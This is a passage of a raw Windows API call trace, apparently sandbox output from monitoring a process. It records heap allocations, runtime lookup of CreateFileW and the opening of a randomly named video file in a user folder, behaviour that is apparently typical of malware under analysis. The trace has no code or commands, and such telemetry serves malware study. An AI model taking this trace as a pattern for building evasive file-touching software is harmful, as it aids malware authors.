0x43a90b0 [0105.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0105.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0105.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0105.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0105.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0105.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0105.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0105.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0105.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0105.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0105.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0105.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0105.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0105.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0105.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0105.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0105.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0105.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0105.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0105.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0105.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0105.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0105.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0105.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0105.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0105.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0105.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0105.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0105.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0105.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0105.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0105.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0105.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0105.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0105.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0105.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0105.285] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0105.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0105.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0105.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0105.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0105.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0105.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0105.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0105.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0105.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0105.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0105.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0105.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0105.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0105.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0105.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0105.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0105.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0105.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0105.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0105.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0105.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0105.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0105.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0105.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0105.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0105.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0105.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0105.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0105.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0105.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0105.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0105.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0105.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0105.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0105.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0105.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0105.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0105.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0105.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0105.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0105.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0105.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0105.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0105.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0105.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0105.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0105.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0105.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0105.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0105.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0105.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0105.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0105.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0105.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0105.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0105.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0105.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0105.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0105.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0105.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0105.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0105.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0105.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0105.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0105.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0105.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0105.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0105.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0105.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0105.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0105.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0105.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0105.288] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0105.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0105.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0105.343] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0105.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa90 [0105.343] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43caa90, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0105.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0105.343] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0105.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0105.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0105.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0105.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0105.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0105.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0105.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0105.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0105.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0105.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0105.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0105.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0105.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0105.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0105.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0105.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0105.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0105.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0105.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0105.344] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\C98TxuIy1khtVyZ_cTR.avi" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\yyowebt9y9iuoorjx\\c98txuiy1khtvyz_ctr.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0105.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0105.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9c68 [0105.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0105.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0105.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0105.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0105.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0105.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0105.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0105.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0105.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0105.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0105.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0105.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0105.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0105.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd0) returned 0x19d3920 [0105.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0105.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0105.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0105.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0105.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0105.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0105.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0105.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0105.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0105.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0105.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0105.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0105.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0105.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0105.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0105.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0105.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0105.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0105.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0105.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0105.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0105.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0105.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0105.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0105.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0105.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0105.345] FreeLibrary (hLibModule=0x772d0000) returned 1 [0105.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0105.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0105.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0105.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0105.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0105.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0105.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0105.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0105.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0105.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0105.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0105.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0105.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0105.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0105.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0105.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0105.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0105.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0105.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0105.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0105.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0105.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0105.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0105.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0105.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0105.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0105.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0105.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0105.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0105.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0105.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0105.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0105.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0105.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0105.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0105.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0105.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0105.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0105.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0105.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0105.347] PeekMessageW (in: lpMsg=0x144e29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e29c) returned 0 [0105.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0105.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0105.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0105.347] PeekMessageW (in: lpMsg=0x144e29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e29c) returned 0 [0105.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0105.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0105.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0105.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0105.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0105.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0105.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0105.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0105.347] PeekMessageW (in: lpMsg=0x144e29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e29c) returned 0 [0105.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 